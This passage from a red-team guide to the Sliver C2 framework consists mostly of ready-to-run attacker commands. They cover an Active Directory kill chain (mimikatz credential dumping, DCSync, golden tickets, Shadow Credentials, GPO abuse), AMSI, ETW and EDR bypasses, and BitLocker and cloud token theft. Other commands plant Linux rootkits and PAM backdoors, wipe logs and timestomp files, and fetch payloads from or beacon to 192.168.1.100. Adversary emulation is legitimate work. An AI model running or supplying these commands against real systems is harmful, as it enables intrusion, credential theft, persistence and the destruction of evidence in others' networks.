Multi-Stage Attack Paths

Complex environments often require chaining multiple techniques to reach high-value targets:

# Stage 1: Initial access and local recon
sliver (beacon) > seatbelt -group=system
sliver (beacon) > execute -c "whoami /priv"

# Stage 2: Credential harvesting
sliver (beacon) > mimikatz -c "sekurlsa::logonpasswords"
sliver (beacon) > powershell -c "Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.config -File -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern 'password'"

# Stage 3: Local privilege escalation
sliver (beacon) > getprivs
sliver (beacon) > execute -c "C:\\temp\\PrintSpoofer.exe -c \"C:\\temp\\beacon.exe\""

# Stage 4: Domain reconnaissance
sliver (beacon) > sharphound -c All
sliver (beacon) > download C:\\Windows\\Temp\\ad-data.zip

# Stage 5: Lateral movement to identified targets
sliver (beacon) > wmiexec -d example.local -u Administrator -H 64f12cddaa88057e06a81b54e73b949b -c "C:\\Windows\\Temp\\beacon.exe" -t sql01.example.local

# Stage 6: Domain privilege escalation via identified path
sliver (beacon) > powershell -c "Add-DomainObjectAcl -TargetIdentity 'DC=example,DC=local' -PrincipalIdentity 'SQL_SVC' -Rights DCSync -Verbose"
sliver (beacon) > mimikatz -c "lsadump::dcsync /domain:example.local /user:krbtgt"

# Stage 7: Enterprise-wide domain dominance
sliver (beacon) > mimikatz -c "kerberos::golden /domain:example.local /sid:S-1-5-21-... /krbtgt:hash /user:ghost /ptt"

Shadow Credentials Attack

The Shadow Credentials attack allows credential theft without changing the victim's password:

# Check current privileges and permissions
sliver (beacon) > powershell -c "Get-DomainUser -Identity targetuser -Properties objectsid,msds-keyversionnumber"

# Install ROADTools for Shadow Credentials attack
sliver (beacon) > powershell-import /path/to/ROADtools.ps1

# Add a new key credential to the target user
sliver (beacon) > execute-assembly -a Whisker.exe -m add /target:targetuser

# Request a TGT using the added key credential
sliver (beacon) > execute-assembly -a Rubeus.exe -m asktgt /user:targetuser /certificate:MIIRd[...snip...] /password:SecretPassword /domain:example.local /dc:dc01.example.local /ptt

# Verify access with the new ticket
sliver (beacon) > powershell -c "Get-DomainController | Select-Object name"

Group Policy Abuse

Group Policy Objects (GPOs) can be abused for privilege escalation and lateral movement:

# Enumerate GPOs in the domain
sliver (beacon) > powershell -c "Get-DomainGPO | Select-Object DisplayName, Name, GPCFileSysPath"

# Find GPOs where you have write permissions
sliver (beacon) > powershell -c "Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match 'Write|Create|Delete' -and $_.SecurityIdentifier -match $(Convert-NameToSid 'ControlledUser')}"

# Check what OUs a GPO applies to
sliver (beacon) > powershell -c "Get-DomainOU | Get-DomainGPLink | Select-Object GPOName, OUName"

# Modify a GPO for immediate scheduled task deployment
sliver (beacon) > powershell-import /path/to/New-GPOImmediateTask.ps1
sliver (beacon) > powershell -c "New-GPOImmediateTask -TaskName 'UpdateSystem' -Command 'powershell.exe' -CommandArguments '-NoP -ExecutionPolicy Bypass -c \"iex (New-Object Net.WebClient).DownloadString(''http://192.168.1.100/payload.ps1'')\"' -GPODisplayName 'Workstation Policy'"

# Force GPO update on a target
sliver (beacon) > execute -c "Invoke-GPUpdate -Computer targetcomputer.example.local -Force"

LSASS Protection Bypass and Advanced Credential Access

Modern environments implement protections for LSASS which require advanced bypass techniques:

# Check if LSASS protection is enabled (PPL)
sliver (beacon) > execute -c "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v RunAsPPL"

# Bypass using PPLKiller
sliver (beacon) > upload /path/to/PPLKiller.exe C:\\temp\\
sliver (beacon) > execute -c "C:\\temp\\PPLKiller.exe"

# Bypass using Mimikatz driver
sliver (beacon) > mimikatz -c "!+"
sliver (beacon) > mimikatz -c "!processprotect /process:lsass.exe /remove"
sliver (beacon) > mimikatz -c "sekurlsa::logonpasswords"

# Extract credentials using nanodump (avoids suspicious MiniDump API)
sliver (beacon) > upload /path/to/nanodump.exe C:\\temp\\
sliver (beacon) > execute -c "C:\\temp\\nanodump.exe --write C:\\temp\\lsass.dmp"
sliver (beacon) > download C:\\temp\\lsass.dmp

# Extract credentials from SAM database offline
sliver (beacon) > execute -c "reg save HKLM\\SYSTEM C:\\temp\\system.hive"
sliver (beacon) > execute -c "reg save HKLM\\SAM C:\\temp\\sam.hive"
sliver (beacon) > download C:\\temp\\system.hive
sliver (beacon) > download C:\\temp\\sam.hive

# Extract credentials from domain cached credentials (DCC2)
sliver (beacon) > execute -c "reg save HKLM\\SECURITY C:\\temp\\security.hive"
sliver (beacon) > download C:\\temp\\security.hive

Advanced Defense Evasion

Modern security solutions employ various detection mechanisms that require additional evasion techniques:

# Detect and disable EDR products
sliver (beacon) > execute -c "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct GET displayName,productState,pathToSignedProductExe"

# Bypass AMSI at runtime
sliver (beacon) > powershell -c "$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*Am*ils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)"

# Disable ETW using direct syscalls
sliver (beacon) > execute-assembly -a SilenceETW.exe

# Disable Script Block Logging
sliver (beacon) > powershell -c "[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)"

# Bypass PowerShell execution policy
sliver (beacon) > powershell -ExecutionPolicy Bypass -c "Write-Host 'Execution Policy Bypassed'"

# Use alternate data streams to hide payloads
sliver (beacon) > execute -c "type C:\\temp\\beacon.exe > C:\\Program Files\\Windows NT\\Accessories:beacon.exe"
sliver (beacon) > execute -c "wmic process call create \"C:\\Program Files\\Windows NT\\Accessories:beacon.exe\""

# Use WDAC/AppLocker bypass techniques
sliver (beacon) > upload /path/to/payload.dll C:\\Windows\\System32\\
sliver (beacon) > execute -c "rundll32.exe C:\\Windows\\System32\\payload.dll,EntryPoint"

# Bypass Windows Defender using in-memory patching
sliver (beacon) > execute-assembly -a AmsiScanBufferBypass.exe

Hardware Security Bypass and TPM Attacks

In some secure environments, hardware security modules must be bypassed:

# Check TPM status
sliver (beacon) > execute -c "Get-Tpm | Format-List"

# Enumerate BitLocker volumes and protectors
sliver (beacon) > execute -c "manage-bde -status"
sliver (beacon) > execute -c "manage-bde -protectors -get C:"

# Extract BitLocker recovery key from Active Directory
sliver (beacon) > powershell -c "Get-ADObject -Filter {objectClass -eq 'msFVE-RecoveryInformation'} -Properties msFVE-RecoveryPassword | Select-Object -ExpandProperty msFVE-RecoveryPassword"

# Extract TPM-protected keys (requires elevated privileges)
sliver (beacon) > upload /path/to/Mimikatz/mimidrv.sys C:\\temp\\
sliver (beacon) > mimikatz -c "!+"
sliver (beacon) > mimikatz -c "privilege::debug"
sliver (beacon) > mimikatz -c "token::elevate"
sliver (beacon) > mimikatz -c "crypto::capi"
sliver (beacon) > mimikatz -c "crypto::cng"
sliver (beacon) > mimikatz -c "crypto::certificates /export"

Hybrid AD and Cloud Environment Attacks

Modern Active Directory environments are often integrated with cloud services, creating additional attack vectors:

# Enumerate Azure AD Connect configuration
sliver (beacon) > powershell -c "Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Azure AD Connect'"

# Check for Azure AD Connect sync accounts
sliver (beacon) > powershell -c "Get-ADUser -Filter {samAccountName -like 'MSOL_*'} -Properties * | Select-Object SamAccountName, Description"

# Extract Azure AD Connect credentials (requires admin on the sync server)
sliver (beacon) > upload /path/to/AADInternals.ps1 C:\\temp\\
sliver (beacon) > powershell -c "Import-Module C:\\temp\\AADInternals.ps1; Get-AADConnectCredentials"

# Extract Azure Service Principal credentials
sliver (beacon) > powershell -c "Get-ChildItem -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' | Get-ItemProperty | Where-Object {$_.DisplayName -like '*Azure*'} | Select-Object DisplayName, InstallLocation"

# Check for cached cloud credentials
sliver (beacon) > powershell -c "Get-ChildItem -Path $env:USERPROFILE\\.azure -Recurse"
sliver (beacon) > powershell -c "Get-ChildItem -Path $env:USERPROFILE\\.aws -Recurse"

# On-prem to cloud pivoting (Token theft)
sliver (beacon) > powershell -c "Get-Process | Where-Object {$_.ProcessName -eq 'Teams' -or $_.ProcessName -eq 'OneDrive' -or $_.ProcessName -eq 'outlook'} | Select-Object Id, ProcessName"
sliver (beacon) > execute-assembly -a TokenTheft.exe -m --pid 1234 --outfile C:\\temp\\tokens.txt

# Extract Azure tokens from browser cache
sliver (beacon) > execute-assembly -a SharpChrome.exe -m cookies --url login.microsoftonline

# Abuse on-premises Global Administrator privileges
sliver (beacon) > powershell -c "Install-Module -Name Az -Force"
sliver (beacon) > powershell -c "Connect-AzAccount -TenantId yourtenant.onmicrosoft.com"
sliver (beacon) > powershell -c "Get-AzVM | Select-Object Name, ResourceGroupName, Location"

Linux-Specific Advanced Attacks

Linux environments require specialized attack techniques:

# Kernel module rootkit installation (requires root)
sliver (beacon) > upload /path/to/rootkit.ko /tmp/
sliver (beacon) > execute -c "insmod /tmp/rootkit.ko"

# Persistence through PAM modules
sliver (beacon) > upload /path/to/backdoor-pam.so /lib/security/
sliver (beacon) > execute -c "echo 'auth optional /lib/security/backdoor-pam.so' >> /etc/pam.d/common-auth"

# Advanced Linux memory forensics avoidance
sliver (beacon) > execute -c "echo 1 > /proc/sys/vm/drop_caches"
sliver (beacon) > execute -c "dd if=/dev/zero of=/proc/self/mem bs=1M count=64 seek=0 conv=notrunc"

# Disable auditd for stealth
sliver (beacon) > execute -c "service auditd stop"
sliver (beacon) > execute -c "chmod -x /usr/sbin/auditd"

# Container escape techniques
sliver (beacon) > execute -c "find / -name docker.sock 2>/dev/null"
sliver (beacon) > execute -c "docker run -v /:/host -it alpine chroot /host bash"

# Linux kernel capabilities abuse
sliver (beacon) > execute -c "getcap -r / 2>/dev/null"
sliver (beacon) > execute -c "cp /bin/bash /tmp/bash-suid"
sliver (beacon) > execute -c "setcap cap_setuid+ep /tmp/bash-suid"
sliver (beacon) > execute -c "/tmp/bash-suid -p"

Advanced OPSEC and Evasion

Counter-Forensics Techniques

After achieving objectives, proper cleanup ensures minimal forensic evidence:

# Windows counter-forensics
sliver (beacon) > powershell -c "Remove-Item -Path C:\\Windows\\Prefetch\\* -Force -ErrorAction SilentlyContinue"
sliver (beacon) > powershell -c "Remove-Item -Path C:\\Windows\\System32\\winevt\\Logs\\* -Force -ErrorAction SilentlyContinue"
sliver (beacon) > powershell -c "Clear-RecycleBin -Force"

# Clear Windows logs selectively
sliver (beacon) > powershell -c "wevtutil cl Security"
sliver (beacon) > powershell -c "wevtutil cl System"
sliver (beacon) > powershell -c "wevtutil cl Application"
sliver (beacon) > powershell -c "wevtutil cl 'Windows PowerShell'"

# Selectively modify event log entries
sliver (beacon) > execute-assembly -a EventLogEditor.exe -m --eventid 4624 --logname Security --remove

# Remove specific command history entries
sliver (beacon) > powershell -c "$history = Get-Content (Get-PSReadlineOption).HistorySavePath; $history | Where-Object {$_ -notmatch 'suspicious-command'} | Set-Content (Get-PSReadlineOption).HistorySavePath"

# Linux counter-forensics
sliver (beacon) > execute -c "rm -rf ~/.bash_history"
sliver (beacon) > execute -c "find /var/log -type f -exec sh -c 'cat /dev/null > {}' \\;"
sliver (beacon) > execute -c "echo > /var/log/auth.log"
sliver (beacon) > execute -c "echo > /var/log/syslog"

# Timestomping (manipulate file timestamps)
sliver (beacon) > upload /path/to/Timestomper.exe C:\\temp\\
sliver (beacon) > execute -c "C:\\temp\\Timestomper.exe -f C:\\temp\\beacon.exe -r C:\\Windows\\System32\\calc.exe"

# Memory resident operations only
sliver (beacon) > execute-assembly -a -m ReflectiveLoader.exe /path/to/payload.bin

Sandbox Detection and Evasion

Advanced red team operations should include sandbox detection to prevent analysis:

# General environment checks
sliver (beacon) > execute -c "wmic computersystem get manufacturer,model,name,username"
sliver (beacon) > execute -c "systeminfo | findstr /i \"domain\""
sliver (beacon) > execute -c "wmic process get name,ExecutablePath | findstr -i \"wireshark procmon process tcpview autoruns\""

# Check for virtualization artifacts
sliver (beacon) > execute -c "wmic bios get serialnumber"
sliver (beacon) > execute -c "wmic diskdrive get model,serialNumber"
sliver (beacon) > execute -c "reg query HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0 /v Identifier"

# Memory resource checks
sliver (beacon) > execute -c "wmic computersystem get TotalPhysicalMemory"
sliver (beacon) > execute -c "wmic cpu get NumberOfCores,NumberOfLogicalProcessors"

# Human interaction detection
sliver (beacon) > powershell -c "$LastInput = [Environment]::TickCount - [System.Windows.Forms.SystemInformation]::LastInputTime; if($LastInput -lt 300000) {Write-Host 'Real user detected'} else {exit}"

# Generate implant with built-in sandbox evasion
sliver > generate beacon --https 192.168.1.100:443 --evasion-sandbox --min-disk 100 --min-cpus 2 --min-memory 4096 -o sandbox-evasive.exe

Operational Timestamps and Activity Scheduling

Control the timing of operations to blend with normal working hours:

# Generate a beacon with limited working hours
sliver > generate beacon --https 192.168.1.100:443 --limit-datetime --limit-datedays Monday,Tuesday,Wednesday,Thursday,Friday --limit-hours 9-17 -o business-hours.exe

# Scheduled callbacks to avoid continuous network connections
sliver > generate beacon --https 192.168.1.100:443 --jitter 30 --seconds 3600 -o hourly-check.exe

# Limit activity during specific hours from the operator side
sliver (beacon) > sleep 14400  # Sleep for 4 hours, i.e., overnight

# Configure beacon to match typical employee behavior
sliver > generate beacon --https 192.168.1.100:443 --limit-hours 9-17 --limit-datedays Monday,Tuesday,Wednesday,Thursday,Friday --format exe -o work-hours-only.exe

# Randomize callback times to avoid pattern detection
sliver > generate beacon --https 192.168.1.100:443 --jitter 45 --seconds 1800 -o randomized-beacon.exe

Conclusion

This guide has covered advanced techniques for using the Sliver C2 framework in professional red team operations. From establishing initial access with evasive payloads to achieving domain dominance and maintaining access, Sliver provides a robust platform for adversary emulation.

Remember to always operate within authorized boundaries and use these techniques responsibly for defensive purposes. The most effective red team operations not only demonstrate security weaknesses but also help organizations build stronger defenses against real-world adversaries.

https://sliver.sh/docs